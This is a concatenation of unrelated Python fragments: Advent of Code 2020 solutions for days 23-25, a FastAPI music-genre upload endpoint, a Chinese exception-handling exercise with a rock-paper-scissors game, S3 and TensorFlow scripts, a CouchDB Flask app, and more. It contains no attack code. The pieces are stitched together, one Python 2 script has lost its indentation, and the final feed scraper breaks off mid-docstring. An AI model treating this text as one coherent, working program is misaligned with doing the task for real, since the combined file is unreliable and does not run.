        lkl[curval] = lkl[n3]
        #log.trace(f" re-chained from current={curval} to={lkl[n3]}, taken={[n1, n2, n3]}")
        # The crab selects a destination cup:
        # the cup with a label equal to the current cup's label minus one.
        # If this would select one of the cups that was just picked up,
        # the crab will keep subtracting one until it finds a cup
        # that wasn't just picked up.
        # If at any point in this process the value goes below
        # the lowest value on any cup's label, it wraps around
        # to the highest value on any cup's label instead.
        for _ in range(list_len):
            if _ == 0:
                nextval = curval
            nextval -= 1
            #log.trace(f" chknextval={nextval}")
            if nextval in [n1, n2, n3]:
                #log.trace(f" is in outtakes")
                continue
            if nextval <= 0:
                # wrap: set to max+1 and continue so the decrement at the top
                # of the loop lands exactly on the maximum label.
                # NOTE(review): max() over all keys is O(n) per wrap — minor
                # amortized over 10M rounds, but worth knowing.
                nextval = max(lkl.keys())+1
                continue
            else:
                break
        #log.trace(f" current={curval} picked={[n1, n2, n3]}, dest={nextval}")
        # The crab places the cups it just picked up
        # so that they are immediately clockwise of the destination cup.
        # They keep the same order as when they were picked up.
        next_end_val = lkl[nextval] # store end value
        lkl[nextval] = n1 # break open the chain
        # lkl[n1] == n2
        # lkl[n2] == n3
        lkl[n3] = next_end_val # close the chain again
        # The crab selects a new current cup:
        # the cup which is immediately clockwise of the current cup
        curval = lkl[curval]
        if rd % 1_000_000 == 0:
            took_tm = int(time.time()) - start_tm
            log.info(f"round={rd:,} time_taken sofar {took_tm}s")
    # unroll the successor map back into a plain list, starting at curval
    out_lst = []
    for i in range(list_len):
        if i == 0:
            #last_val = 1
            last_val = curval
        out_lst.append(last_val)
        last_val = lkl[last_val]
    return out_lst
def play_crabcups_game_opt(l, rounds=1):
    """Driver for the optimized linked-list crab-cups implementation."""
    log.info(f"[play_crabcups_game] started: l={l}, rounds={rounds}")
    return play_crabcups_round_opt(l, rounds)
def score_crabcups_game_part2(l):
    """Return the product of the two cup labels immediately clockwise of cup 1.

    Bug fix: the original's wrap-around branch started at tgt_idx+1 instead
    of tgt_idx, skipping the first cup after cup 1.  Both positions are now
    taken starting at tgt_idx, modulo the list length, which also makes the
    non-wrap special case unnecessary.
    """
    lst_len = len(l)
    tgt_idx = (l.index(1) + 1) % lst_len
    first = l[tgt_idx]
    second = l[(tgt_idx + 1) % lst_len]
    return first * second
# In[ ]:
# check part 1 game results and scores still valid...
tests = "389125467"
test_lst = mapl(int, list(tests))
res = play_crabcups_game_opt(test_lst, rounds=10)
log.info(f"test result={res}")
score1 = score_crabcups_game(res)
assert( 92658374 == score1 )
# bug fix: the original logged `score` BEFORE computing it in this cell,
# printing a stale value from an earlier cell (NameError on a fresh run);
# compute first, log afterwards.
score = score_crabcups_game_part2(res)
log.info(f"test result 10rds score part 1={score1}")
log.info(f"test result 10rds score part 2={score}")
# still valid...
ins = aoc.read_file_to_str('in/day23.in').strip()
ins_lst = mapl(int, list(ins))
res = play_crabcups_game_opt(ins_lst, rounds=100)
log.info(f"Day 23 part 1 result={res}")
score1 = score_crabcups_game(res)
log.info(f"Day 23 part 1 solution: result 100rds score={score1}")
score = score_crabcups_game_part2(res)
log.info(f"Day 23 part 2 check: result 100rds score2={score}")
assert( 74698532 == score1 )
# In[ ]:
# part 2 proper: one million cups, ten million rounds (example first)
test2_lst = assemble_crabcups2_list(test_lst, num_cups = 1_000_000)
log.info("done")
assert( 1_000_000 == len(test2_lst) )
res = play_crabcups_game_opt(test2_lst, rounds=10_000_000)
log.info("done2")
score2 = score_crabcups_game_part2(res)
log.info(f"score2={score2}")
assert( 1_000_000 == len(res) )
assert( 149245887792 == score2 )
# In[ ]:
ins2_lst = assemble_crabcups2_list(ins_lst, num_cups = 1_000_000)
res = play_crabcups_game_opt(ins2_lst, rounds=10_000_000)
log.info("done2")
score2 = score_crabcups_game_part2(res)
log.info(f"Day 23 part 2 solution: score2={score2}")
# ### Day 24: Lobby Layout
#
# Hexagonal geometry and hexagonal 2d-coordinates.
#
# See red blob games site [Hexagonal Grids](https://www.redblobgames.com/grids/hexagons/)
# for thorough explanations.
# Thanks to colleague P S for the hint! \
# Last used in Advent of Code 2017, day 11. \
# Todays aoc hint: [Hexagonal tiling - Wikipedia](https://en.wikipedia.org/wiki/Hexagonal_tiling)
#
# In[ ]:
def cl(l):
    """Return compact list str representation.

    NOTE: the replacement also affects ", " sequences inside element reprs
    (e.g. tuples); fine for the lists of short direction strings used here.
    """
    return str(l).replace(', ',',')
# Using pointy topped grid/geometry and axial coordinates.
# Using axis notation [q,r] here, q is west>east and r is south>north
# translation vectors for the six hex directions in axial (q, r) coords
hex2d_axial_pt_translations = {'e':[1,0], 'w':[-1,0], 'se':[0,1], 'sw':[-1,1], 'ne':[+1,-1], 'nw':[0,-1]}
def hex_axial_distance(a, b):
    """Hex-grid distance between two axial (q, r) coordinates."""
    dq = a[0] - b[0]
    dr = a[1] - b[1]
    # equivalent to half the L1 norm of the cube-coordinate delta
    return int((abs(dq) + abs(dq + dr) + abs(dr)) / 2)
# east, southeast, southwest, west, northwest, and northeast
# => e, se, sw, w, nw, and ne
def parse_day24_line(s):
    """Split a direction string like 'esenw' into tokens ['e', 'se', 'nw', ...]."""
    log.debug(f"parse_day24_line in={s}")
    out_trs = []
    while len(s) > 0:
        log.trace(f"out_trs={out_trs} rest={s}")
        # two-letter diagonal directions take precedence over 'e'/'w'
        head2 = s[:2]
        if head2 in ('se', 'sw', 'nw', 'ne'):
            out_trs.append(head2)
            s = s[2:]
        elif s[:1] in ('e', 'w'):
            out_trs.append(s[:1])
            s = s[1:]
        else:
            raise Exception(f"unforeseen: {s}")
    log.debug(f"parse_day24_line returns {cl(out_trs)}")
    return out_trs
def parse_day24(los):
    """Parse every input line into its list of direction tokens."""
    return [parse_day24_line(line) for line in los]
def flip_day24_line(steps):
    """Walk the hex steps from the origin; return the final axial (q, r) coord."""
    q, r = 0, 0
    for step in steps:
        dq, dr = hex2d_axial_pt_translations[step]
        q, r = q + dq, r + dr
    return (q, r)
def flip_day24_lines(steps_lol):
    """Count, per destination tile, how many instruction lines end there."""
    flips = defaultdict(int)
    for steps in steps_lol:
        flips[flip_day24_line(steps)] += 1
    return flips
# In[ ]:
# 'esew' ends one tile south-east of the reference tile
test1 = 'esew'
flip_day24_line( parse_day24_line(test1) )
# In[ ]:
# 'nwwswee' ends back on the reference tile
test2 = 'nwwswee'
flip_day24_line( parse_day24_line(test2) )
# In[ ]:
tests = """
sesenwnenenewseeswwswswwnenewsewsw
neeenesenwnwwswnenewnwwsewnenwseswesw
seswneswswsenwwnwse
nwnwneseeswswnenewneswwnewseswneseene
swweswneswnenwsewnwneneseenw
eesenwseswswnenwswnwnwsewwnwsene
sewnenenenesenwsewnenwwwse
wenwwweseeeweswwwnwwe
wsweesenenewnwwnwsenewsenwwsesesenwne
neeswseenwwswnwswswnw
nenwswwsewswnenenewsenwsenwnesesenew
enewnwewneswsewnwswenweswnenwsenwsw
sweneswneswneneenwnewenewwneswswnese
swwesenesewenwneswnwwneseswwne
enesenwswwswneneswsenwnewswseenwsese
wnwnesenesenenwwnenwsewesewsesesew
nenewswnwewswnenesenwnesewesw
eneswnwswnwsenenwnwnwwseeswneewsenese
neswnwewnwnwseenwseesewsenwsweewe
wseweeenwnesenwwwswnew
""".strip().split("\n")
flips = flip_day24_lines( parse_day24(tests) )
# a tile flipped an odd number of times ends up black
tiles_black = filterl(lambda it: flips[it] % 2 == 1, flips.keys())
log.info(f"Day 24 part 1 tests solutions: black tiles#={len(tiles_black)}") #" from {tiles_black}")
assert( 10 == len(tiles_black))
# In[ ]:
ins = aoc.read_file_to_list('in/day24.in')
flips = flip_day24_lines( parse_day24(ins) )
tiles_black = filterl(lambda it: flips[it] % 2 == 1, flips.keys())
log.info(f"Day 24 part 1 solution: black tiles#={len(tiles_black)}") #" from {tiles_black}")
# In[ ]:
print("Day 24 b")
# cellular automaton on this hexagonal tile geometry space
def get_extents(tiles_black):
    """Return [[q_min, q_max], [r_min, r_max]] bounding box of the black tiles."""
    qs = [coord[0] for coord in tiles_black]
    rs = [coord[1] for coord in tiles_black]
    return [[min(qs), max(qs)], [min(rs), max(rs)]]
def num_neighbors(c, tiles_black):
    """Count black tiles among the six hex neighbours of axial coord c.

    Performance fix: the original computed a hex distance against EVERY
    black tile on each call (the dominant cost of the 100-round automaton,
    noted below as taking ~1500 s); testing the six neighbour coordinates
    for set membership avoids the per-tile arithmetic.  Per-call trace
    logging was dropped for the same reason.
    """
    q, r = c
    blacks = set(tiles_black)
    # the six axial-coordinate neighbour offsets: e, w, se, sw, ne, nw
    neighbors = ((q+1, r), (q-1, r), (q, r+1), (q-1, r+1), (q+1, r-1), (q, r-1))
    nsum = sum(1 for nb in neighbors if nb in blacks)
    assert( nsum <= 6 )
    return nsum
def cell_automate(tiles_black, rounds = 1):
    """Run the hexagonal cellular automaton for `rounds` generations.

    tiles_black: list of axial (q, r) coords of black tiles.  Each round
    scans the bounding box padded by one cell on every side and applies:
    black flips to white with 0 or >2 black neighbours; white flips to
    black with exactly 2.  Returns the new list of black tiles.
    NOTE(review): `c in tiles_black` is an O(n) list scan per cell — a
    likely cause of the ~1500 s runtime noted below; a set would be O(1).
    """
    exts = get_extents(tiles_black)
    log.info(f"[cell_automate] at round 0: num-tiles-black={len(tiles_black)}; extents={exts}") #" from {sorted(tiles_black)}")
    start_tm = int(time.time())
    for rnd in range(1, rounds+1):
        new_tiles_black = tiles_black.copy()
        exts = get_extents(tiles_black)
        log.debug(f"round {rnd}: extents found={exts}")
        q_min, q_max = exts[0]
        r_min, r_max = exts[1]
        # pad the bounding box by one: new black tiles can only appear there
        for q in range(q_min-1, q_max+1+1):
            for r in range(r_min-1, r_max+1+1):
                c = (q, r)
                nneibs = num_neighbors(c, tiles_black)
                if c in tiles_black:
                    if nneibs == 0 or nneibs > 2:
                        log.debug(f"flip-to-white {c} nneibs={nneibs}")
                        new_tiles_black.remove(c)
                else:
                    if nneibs == 2:
                        log.debug(f"flip-to-black {c} nneibs={nneibs}")
                        new_tiles_black.append(c)
        tiles_black = new_tiles_black
        took_tm = int(time.time()) - start_tm
        log.info(f" after round {rnd} @{took_tm:>5}s: num-tiles-black={len(tiles_black)}; extents={exts}") #" from {sorted(tiles_black)}")
    log.info(f"[cell_automate] finished round {rnd}: num-tiles-black={len(tiles_black)}; extents={exts}") #" from {sorted(tiles_black)}")
    return tiles_black
flips = flip_day24_lines( parse_day24(tests) )
# example expectations from the puzzle text: 10 -> 15 -> 12 -> ... -> 2208
tiles_black = filterl(lambda it: flips[it] % 2 == 1, flips.keys())
assert 10 == len(tiles_black)
tiles_black2 = cell_automate(tiles_black, rounds=1)
assert 15 == len(tiles_black2)
tiles_black2 = cell_automate(tiles_black, rounds=2)
assert 12 == len(tiles_black2)
tiles_black2 = cell_automate(tiles_black, rounds=10)
assert 37 == len(tiles_black2)
tiles_black2 = cell_automate(tiles_black, rounds=20)
assert 132 == len(tiles_black2)
if EXEC_RESOURCE_HOGS:
    tiles_black2 = cell_automate(tiles_black, rounds=100)
    assert 2208 == len(tiles_black2)
# In[ ]:
if EXEC_RESOURCE_HOGS:
    flips = flip_day24_lines( parse_day24(ins) )
    tiles_black = filterl(lambda it: flips[it] % 2 == 1, flips.keys())
    log.info(f"Day 24 part 1 solution: black tiles#={len(tiles_black)}") #" from {tiles_black}")
    tiles_black2 = cell_automate(tiles_black, rounds=100)
    log.info(f"Day 24 part 2 solution: black tiles#={len(tiles_black2)}") #" from {tiles_black}")
    # took 1496 seconds!
# ### Day 25: Combo Breaker
# In[ ]:
def find_loopsize(pubkey, max_iter=100_000):
    """Brute-force the loop size whose subject-7 transform yields pubkey.

    Raises if pubkey is not reached within max_iter iterations.
    """
    subjectnum = 7
    val = 1
    for i in range(1, max_iter+1):
        val = (val * subjectnum) % 20201227
        if val == pubkey:
            return i
    raise Exception("failsafe")
def encrypt_day25(subjectnum=7, loopsize=None):
    """Apply the day-25 transform: subjectnum ** loopsize mod 20201227.

    Uses three-argument pow() (modular exponentiation) instead of the
    original Python loop — O(log loopsize) instead of O(loopsize) — and
    drops the per-call info log.
    """
    return pow(subjectnum, loopsize, 20201227)
# In[ ]:
# example public keys (card, then door) from the puzzle text
tests = """
5764801
17807724
""".strip()
# In[ ]:
card_pubkey, door_pubkey = mapl(int, tests.split("\n"))
# bug fix: the original line was missing the f-prefix (and used parentheses
# instead of braces), so it logged the literal text "{card_pubkey}" /
# "(door_pubkey)" instead of the values
log.info(f"tests card-pubkey={card_pubkey}, door pubkey={door_pubkey}")
card_loopsize = find_loopsize(card_pubkey)
door_loopsize = find_loopsize(door_pubkey)
log.info(f"tests result: card-loopsize={card_loopsize}, door_loopsize={door_loopsize}")
t1 = encrypt_day25(subjectnum=door_pubkey, loopsize=card_loopsize)
t2 = encrypt_day25(subjectnum=card_pubkey, loopsize=door_loopsize)
log.info(f"tests result: encryption key={t1} : encrypted {t1} =? {t2}")
assert( t1 == t2 )
# In[ ]:
ins = aoc.read_file_to_list('in/day25.in')
card_pubkey, door_pubkey = mapl(int, ins)
log.info(f"card-pubkey={card_pubkey}, door pubkey={door_pubkey}")
card_loopsize = find_loopsize(card_pubkey, max_iter=10_000_000)
door_loopsize = find_loopsize(door_pubkey, max_iter=10_000_000)
log.info(f"intermed result: card-loopsize={card_loopsize:,}, door_loopsize={door_loopsize:,}")
# transforming the other party's public key with one's own loop size must
# yield the same shared encryption key from both sides (Diffie-Hellman style)
t1 = encrypt_day25(subjectnum=door_pubkey, loopsize=card_loopsize)
t2 = encrypt_day25(subjectnum=card_pubkey, loopsize=door_loopsize)
log.info(f"Day 25 solution: encryption key={t1} : encrypted {t1} =? {t2}")
# In[ ]:
|
from fastapi import FastAPI, File, UploadFile, APIRouter, HTTPException
import logging
import joblib
from tensorflow.keras.models import load_model
import librosa
from app.dtos.data_model import Prediction
from app.services.feature_extraction import extract_audio_file_features
import os
import tempfile
router = APIRouter()
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
# model artefacts are loaded once at import time and shared across requests
model_path = "./models/musicgenre_nn_classifier_CSV-V2.h5"
scaler_path = "./models/musicgenre_standard_scaler_CSV-V2.bin"
encoder_path = "./models/musicgenre_encoder_CSV-V2.bin"
model = load_model(model_path)
std_scaler = joblib.load(scaler_path)
classes = joblib.load(encoder_path).classes_
@router.post("", response_model=Prediction)
async def upload_sound_and_predict(audio_file: UploadFile = File(...)):
    """The uploaded file should be a valid mp3 file of a song.

    Spools the upload to a temporary file, extracts its audio features,
    runs the genre classifier and returns the predicted genre plus the
    extracted feature vector.
    """
    extension = os.path.splitext(audio_file.filename)[1]
    logger.info(f"Processing: {audio_file.filename}")
    # Bug fix: validate the extension BEFORE creating the temp file.  The
    # original called mkstemp first and raised the 400 before entering the
    # try/finally, leaking an open fd and an on-disk file per bad upload.
    # (Also fixed the "Uplaoded" typo in the client-facing message.)
    if extension != ".mp3":
        raise HTTPException(status_code=400, detail="Uploaded file should have an mp3 extension")
    fd, path = tempfile.mkstemp(prefix='parser_', suffix=extension)
    logger.info(f"Generated '{path}' temporary file ")
    try:
        with open(path, 'ab') as f:
            # stream the upload in 10 kB chunks rather than reading it whole
            for chunk in iter(lambda: audio_file.file.read(10000), b''):
                f.write(chunk)
        std_audio_data = extract_audio_file_features(path, std_scaler)
        y_prob = model.predict(std_audio_data)
        y_pred = classes[y_prob.argmax(axis=-1)[0]]
        return {"filename": audio_file.filename, "predicted": y_pred, "extracted_features": list(std_audio_data[0])}
    except Exception as e:
        logger.error(f"Error while processing file: {str(e)}")
        raise HTTPException(status_code=500, detail="Error while processing audio file.")
    finally:
        # remove temp file (close the fd mkstemp handed us, then unlink)
        os.close(fd)
        os.remove(path)
|
# @Time :2019/7/6 7:51
# @Author :jinbiao
# 一、必做题
# 1.什么是异常?为什么要捕获异常?
# 异常就是程序在运行时发生的错误
# 可以在程序抛出异常后不终止程序,增加程序的容错性
# 2.异常的完整语法格式
try:
    pass  # code that may raise; exceptions are thrown from here
except:  # catch the exception; a concrete exception type may be specified
    pass  # block executed after the exception is successfully caught
# 3. Execution logic of try / except / else / finally blocks:
try:
    pass  # if an error occurs here, an exception is raised
except:
    pass  # runs only when an exception was caught
else:
    pass  # runs only when NO exception was raised
finally:  # runs regardless of whether an exception was raised
    pass
# 4.编写如下程序
# 优化去生鲜超市买橘子程序
# a.收银员输入橘子的价格,单位:元/斤
# b.收银员输入用户购买橘子的重量,单位:斤
# c.计算并且 输出 付款金额
# 新需求:
# d.使用捕获异常的方式,来处理用户输入无效数据的情况。
# def count_price(unit_price, weight):
# total_price = unit_price * weight
# return total_price
#
#
# while True:
# try:
# unit_price = float(input("请输入橘子的单价"))
# weight = float(input("请输入橘子的重量"))
# except Exception:
# print("请输入正确的格式")
# else:
# a = count_price(unit_price=unit_price, weight=weight)
# print(a)
# break
# 5.编写如下程序
# 优化剪刀石头布优秀程序
# a.提示用户输入要出的拳 —— 石头(1)/剪刀(2)/布(3)
# b.电脑随机出拳
# c.比较胜负,显示用户胜、负还是平局
# 新需求:
# d.使用捕获异常的方式,来处理用户输入无效数据的情况
# e.多次进行游戏,可以让用户选择退出游戏,退出后需要显示胜利情况,例如:用户5局胜、3局败、2局平
# f.当程序结束之后,要求下一次运行程序能够获取用户历史胜负情况
# h.如果使用文件保存用户历史胜负数据,需要使用异常来处理文件不存在的情况(选做)
import random
# Load the saved win/lose/draw record; counters start at zero when the save
# file is empty.
# NOTE(review): this raises FileNotFoundError on a true first run — the
# assignment (item h) suggests wrapping this in try/except.
with open("game_file.txt", mode="r", encoding="utf8") as read_game_file:
    game_data = read_game_file.read()
if len(game_data) > 0:
    # File layout written by on_file(): result, wins, losses, draws.
    data_list = game_data.split(",")
    win_count, lose_count, draw_count = int(data_list[1]), int(data_list[2]), int(data_list[3])
else:
    win_count, lose_count, draw_count = 0, 0, 0
# 猜拳判断
def morra(gesture):
    """Play one round of rock-paper-scissors against the computer.

    :param gesture: the player's move as text, one of "石头"/"剪刀"/"布"
    :return: (result message, total wins, total losses, total draws)
    :raises ValueError: if gesture is not a valid move name (the caller's
        try/except turns this into a re-prompt)
    """
    global win_count, lose_count, draw_count
    dict1 = {1: "石头", 2: "剪刀", 3: "布"}
    # Map the move name back to its numeric key.
    user = list(dict1.keys())[list(dict1.values()).index(gesture)]
    computer = random.randint(1, 3)
    print("电脑出的是{:s}".format(dict1[computer]))
    print("用户出的是{:s}".format(gesture))
    # 1 (rock) beats 2 (scissors), 2 beats 3 (paper), 3 (paper) beats 1 (rock).
    # BUG FIX: the last winning case compared `user == 3 and user == 1`
    # (always False), so "paper beats rock" was incorrectly scored as a loss.
    if (user == 1 and computer == 2) or (user == 2 and computer == 3) or (user == 3 and computer == 1):
        result = "你赢啦"
        win_count += 1
    elif user == computer:
        result = "你们实力相当,平手啦"
        draw_count += 1
    else:
        result = "你输啦"
        lose_count += 1
    return result, win_count, lose_count, draw_count
# 退出游戏存档
def on_file(*args):
    """Persist the game statistics to game_file.txt for the next session.

    :param args: values to store (result message, wins, losses, draws)
    :return: None
    """
    serialized = "".join("{},".format(value) for value in args)
    with open("game_file.txt", mode="w", encoding="utf8") as write_game_file:
        write_game_file.write(serialized)
# Main game loop: show the saved record, then play until the user quits.
with open("game_file.txt", mode="r", encoding="utf8") as read_game_file:
    a = read_game_file.read()
if len(a) >0:
    data_list = a.split(",")
    print("您的历史战绩为赢{}次,输{}次,平{}次".format(data_list[1], data_list[2], data_list[3]))
while True:
    try:
        gesture = str(input("请猜拳"))
        onelist = morra(gesture)
        print(onelist[0])
        quit_game = str(input("是否退出游戏"))
        if quit_game == "是":
            print("本次游戏结束,你战绩为:赢{}次,输{}次,平{}次".format(onelist[1], onelist[2], onelist[3]))
            on_file(*onelist)
            break
    except Exception as e:
        # BUG FIX: the original concatenated str + Exception, which raises
        # TypeError inside the handler; convert the exception explicitly.
        print("输入有误,请重新输入" + str(e))
|
import pygame
from collections import deque
# Table-green background colour used for the play field.
BACKGROUND_COLOR = "#00c000"
# Cheat-code key sequences — presumably compared against the most recent
# keystrokes by the consumer code (deque allows cheap rotation/compare);
# confirm with the game loop.
GOD = deque([pygame.K_g, pygame.K_o, pygame.K_d])
BOM = deque([pygame.K_b, pygame.K_o, pygame.K_m])
FLY = deque([pygame.K_f, pygame.K_l, pygame.K_y])
|
import boto3
import logging
from mmvizutil.compression.utils import make_stream
from mmvizutil.decorators import _retry
log_fmt = '[%(asctime)s - %(levelname)s] - %(name)s - %(message)s'
logging.basicConfig(level=logging.INFO, format=log_fmt)
logger = logging.getLogger('mmvizutil-aws')
def _resource():
    """Return a boto3 S3 resource (high-level object API)."""
    return boto3.resource('s3')
def _client():
    """Return a boto3 S3 client (low-level API, used for listings)."""
    return boto3.client('s3')
class S3Pointer(object):
    """A (bucket, key) reference into S3 with upload/read/list helpers."""
    def __init__(self, bucket, key):
        self.bucket = bucket
        self.key = key
    @classmethod
    def upload(cls, bucket, key, data):
        """
        upload a bytes or seekable file-like object to the given
        bucket in s3
        """
        pointer = cls(bucket, key)
        s3 = _resource()
        resource = s3.Object(pointer.bucket, pointer.key)
        bdata = make_stream(data)
        response = _retry(resource.put)(Body=bdata)
        return response
    @classmethod
    def simple_read(cls, bucket, key):
        """
        a simple read of a file in s3, this is best used for
        smaller files as it reads everything into memory

        NOTE: this is a generator — iterate it (or call next() once) to
        obtain the object's bytes.
        """
        pointer = cls(bucket, key)
        s3 = _resource()
        resource = s3.Object(pointer.bucket, pointer.key)
        resp = resource.get()
        yield resp['Body'].read()
    def list_fns(self, **kwargs):
        """
        return all file names within a given namespace in an
        s3 bucket with the option to use prefixes and other
        filters to limit the number of options returned
        """
        client = _client()
        resp = _retry(client.list_objects_v2)(**kwargs)
        contents = resp.get('Contents')
        if not contents:
            args = ' '.join(['{} = {}\n'.format(k, v) for k, v in kwargs.items()])
            logger.info('The query with the following params returned no results:\n{}'.format(args))
            # BUG FIX: the original did a bare `yield` here (producing a
            # stray None) and then fell through to `yield from None`, which
            # raises TypeError on any empty listing; end the generator
            # cleanly instead.
            return
        yield from contents
|
import tensorflow as tf
# TF1 input pipeline: stream rows of the label CSV through a filename queue.
filename_queue = tf.train.string_input_producer(["../../DataSets/training_label.csv"])
print(filename_queue)
reader = tf.TextLineReader()
# BUG FIX: TextLineReader.read returns a (key, value) pair; the original
# bound the whole tuple to `value`, which breaks decode_csv below.
key, value = reader.read(filename_queue)
print(value)
# Default values, in case of empty columns. Also specifies the type of the
# decoded result.
record_default = [[4], [2], [2]]
col1, col2, col3 = tf.decode_csv(value, record_defaults=record_default)
with tf.Session() as sess:
    # Start populating the filename queue.
    coord = tf.train.Coordinator()
    threads = tf.train.start_queue_runners(coord=coord)
    for i in range(1200):
        # Retrieve a single instance:
        # BUG FIX: sess.run([col3]) returns a single-element list that cannot
        # be unpacked into two names; fetch both tensors instead.
        example, label = sess.run([col1, col3])
    coord.request_stop()
    coord.join(threads)
# -*-coding:utf-8 -*-
__author__ = '$'
import sys
sys.path.append('..')
import tensorflow as tf
import numpy as np
import re
import os
import time
import datetime
import lstm_model
from lstm_model import LSTM_Attention
import csv
import jisuan
import data_helpers
# Parameters
# ==================================================
# Misc Parameters
tf.flags.DEFINE_boolean("allow_soft_placement", True, "Allow device soft device placement")
tf.flags.DEFINE_boolean("log_device_placement", False, "Log placement of ops on devices")
FLAGS = tf.flags.FLAGS
print("\nParameters:")
# NOTE(review): FLAGS.__flags is a private attribute that changed layout in
# later TensorFlow 1.x releases — confirm the pinned TF version.
for attr, value in sorted(FLAGS.__flags.items()):
    print("{}={}".format(attr.upper(), value))
print("")
x_text1,y = data_helpers.load_data_and_labels('test.csv','train.csv') # load test-set examples and labels
y = np.argmax(y,1)
max_length = max([len(x) for x in x_text1]) # length of the longest single example
print('max-length',max_length)
# Join each tokenised example back into one space-separated string.
x_text = []
for x in x_text1:
    x=' '.join(x)
    x_text.append(x)
vocab_path = os.path.join('lstm_runs/1531792671','vocab')
vocab_processor = tf.contrib.learn.preprocessing.VocabularyProcessor.restore(vocab_path) # load the saved vocabulary
x = np.array(list(vocab_processor.transform(x_text))) # map input words to their vocabulary indices
# get the top-five labels from the scores
def get_label_using_probs(scores, top_number=5):
    """Return the indices of the `top_number` highest scores, best first."""
    ranked_ascending = np.argsort(scores)
    return ranked_ascending[-top_number:][::-1]
# ===================== Evaluation =============================
print("Evaluating...\n")
checkpoint_file = tf.train.latest_checkpoint('lstm_runs/1531792671/checkpoints')
# print(checkpoint_file)
graph = tf.Graph()
with graph.as_default():
    session_conf = tf.ConfigProto(
        allow_soft_placement=FLAGS.allow_soft_placement,
        log_device_placement=FLAGS.log_device_placement)
    sess = tf.Session(config=session_conf)
    with sess.as_default():
        # Restore the trained graph structure and weights from the checkpoint.
        saver = tf.train.import_meta_graph('{}.meta'.format(checkpoint_file))
        saver.restore(sess, checkpoint_file)
        input_x1 = graph.get_operation_by_name('input_x1').outputs[0] # fetch the input placeholder
        dropout_keep_prob = graph.get_operation_by_name('dropout_keep_prob').outputs[0]
        predictions = graph.get_operation_by_name('output/predictions').outputs[0]
        b_size = graph.get_operation_by_name('batch_size').outputs[0]
        # Generate batches
        batches = data_helpers.batch_iter(
            list(x),
            1,
            1 ,shuffle=False)
        all_predictions = []
        # Predict one example per batch (batch size 1, no dropout at eval time).
        for x_batch in batches:
            # print(type(x_batch[0][0][0]))
            batch_predictions = sess.run(predictions,{input_x1:x_batch , dropout_keep_prob:1.0 ,b_size:1})
            all_predictions = np.concatenate([all_predictions, batch_predictions])
        correct_predictions = float(sum(all_predictions ==y))
        print('测试集样例总数:{}'.format(len(y)))
        print('Accuracy: {}'.format(correct_predictions/float(len(y))))
# Write per-class sensitivity/specificity to a CSV report.
with open('lstm_result/score.csv', 'w') as fw:
    writer = csv.writer(fw)
    writer.writerow(['5类问题'])
    print('5类问题:')
    L0, T0 = jisuan.lingmingdu_5(all_predictions, y, 0.0) # returns (sensitivity, specificity)
    L1, T1 = jisuan.lingmingdu_5(all_predictions, y, 1.0)
    L2, T2 = jisuan.lingmingdu_5(all_predictions, y, 2.0)
    L3, T3 = jisuan.lingmingdu_5(all_predictions, y, 3.0)
    L4, T4 = jisuan.lingmingdu_5(all_predictions, y, 4.0)
    writer.writerows([['第几类', '灵敏度', '特异度'],
                      [0, L0, T0],
                      [1, L1, T1],
                      [2, L2, T2],
                      [3, L3, T3],
                      [4, L4, T4]])
    writer.writerow(['2类问题'])
    print('2类问题:')
    L0, T0, L1, T1 = jisuan.lingmingdu_2(all_predictions, y)
    writer.writerows([['第几类', '灵敏度', '特异度'],
                      [0, L0, T0],
                      [1, L1, T1]])
    # Tally how many test examples fall into each of the five classes.
    l0 = 0
    l1 = 0
    l2 = 0
    l3 = 0
    l4 = 0
    for cla in y:
        if cla == 0.0:
            l0 += 1
        elif cla == 1.0:
            l1 += 1
        elif cla == 2.0:
            l2 += 1
        elif cla == 3.0:
            l3 += 1
        else:
            l4 += 1
    print('测试集各类数量:')
    print('0/1/2/3/4', l0, ',', l1, ',', l2, ',', l3, ',', l4)
    writer.writerows([['测试集各类数量'],
                      [l0, l1, l2, l3, l4]])
# save the evaluation results
predictions_human_readable = np.column_stack((np.array(x), all_predictions))
out_path = os.path.join('result', 'prediction.csv')
print('保存 evaluation 到 {0}'.format(out_path))
with open(out_path, 'w') as f:
    csv.writer(f).writerows(predictions_human_readable)
|
from flask.ext.api import FlaskAPI
import couchdb
# Connect to the local CouchDB instance (default http://localhost:5984/).
server = couchdb.Server()
update = False
try:
    db = server['peleton-db']
# NOTE(review): the bare except also swallows connection errors; narrowing
# to couchdb.http.ResourceNotFound would be safer — confirm library version.
except:
    db = server.create('peleton-db')
    update = True
# Seed a freshly created database with two work lists and a merge document.
if update:
    db.update([{"_id": "A", "list": [2, 3, 8], "idx": 0}, {"_id": "B", "list": [4, 5, 6], "idx": 0}])
    db.update([{"_id": "merge"}])
app = FlaskAPI(__name__)
from app import routes
from routes import quiz
app.register_blueprint(quiz)
import os
f = open("../Rakuten-real-/userID150-165.csv")
a = []
for i in f:
a.append(i[:-1])
for k in range(16):
g = open("../rakutendb/150-165/"+str(a[k])+".csv")
print "user_number:"+str(k)
print a[k]
count = 0
for line in g:
p = line.split(",")
if p[0].find("http") > -1:
continue
count += 1
if os.path.exists("../rakutendb/item_vec_ae150-165ver1/"+p[0]+".csv") == False:
print p[0]
print count
break
|
"""MIPT Python Course Lections 22"""
print('Граф')
# Adjacency-matrix variant: M is read but unused here; N is the edge count.
M, N = [int(x) for x in input().split()]
V = []
index = {}
A = [[0] * N for i in range(N)]
for i in range(N):
    v1, v2 = input().split()
    # Assign each newly seen vertex the next matrix index.
    for v in v1, v2:
        if v not in index:
            V.append(v)
            index[v] = len(V) - 1
    # NOTE(review): v1_i/v2_i are computed but never used to fill A — the
    # matrix stays all zeros; presumably A[v1_i][v2_i] = 1 was intended.
    v1_i = index[v1]
    v2_i = index[v2]
print(index)
# Adjacency-dict variant: each vertex maps to the set of its neighbours
# (edges stored in both directions).
M, N = [int(x) for x in input().split()]
G = {}
for i in range(N):
    v1, v2 = input().split()
    for v, u in (v1, v2), (v2, v1):
        if v not in G:
            G[v] = {u}
        else:
            G[v].add(u)
|
#!/usr/bin/env python
# coding=utf-8
from feedformatter import Feed
import datetime
import time
try:
import urllib2
PY2 = True
except ImportError:
import requests
PY2 = False
def findSection(text, start, end, includeStart = False, includeEnd = False):
    """Return the substring of `text` delimited by the markers `start` and
    `end`, optionally keeping the markers themselves in the result."""
    begin = text.find(start)
    if not includeStart:
        begin += len(start)
    stop = text.find(end, begin)
    if includeEnd:
        stop += len(end)
    return text[begin:stop]
def getData(url):
    """Scrape today's comic metadata from the Sinfest front page.

